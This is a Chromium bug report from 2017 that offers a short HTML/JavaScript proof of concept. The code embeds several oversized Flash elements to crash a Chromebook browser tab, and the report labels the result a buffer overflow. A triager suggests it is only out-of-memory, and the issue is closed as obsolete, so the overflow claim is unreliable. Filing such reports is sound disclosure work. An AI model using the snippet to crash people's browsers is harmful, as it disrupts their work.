PoC of a Buffer Overflow in the Chromebook
Reported by xbrit7@gmail.com, Jan 25 2017
Issue description
UserAgent: Mozilla/5.0 (X11; CrOS x86_64 8872.76.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.105 Safari/537.36
Platform: Chrome All Versions
Steps to reproduce the problem:
<button onclick="testFunc()">Load</button><p>
<script>
function testFunc() {
  var out = 4;
  for (var i = 0; i < out; i++) {
    var x = document.createElement("EMBED");
    x.src = "textt.swf";
    x.height = ("10000in");
    x.width = ("10000in");
    document.body.appendChild(x);
  }
}
</script>
What is the expected behavior?
Black screen/restart or just crash.
What went wrong?
Buffer Overflow in Flash/Chromebooks.
Crashed report ID: NO
How much crashed? Just one tab
Is it a problem with a plugin? N/A
Did this work before? No
Chrome version: 55.0.2883.105 Channel: stable
OS Version: 8872.76.0
Flash Version: Shockwave Flash 24.0 r0
Jan 27 2017
You are saying the renderer runs out of memory and crashes when requesting too large elements/plugins?
Apr 22 2017
Obsolete.
Comment 1 by dhadd...@chromium.org, Jan 27 2017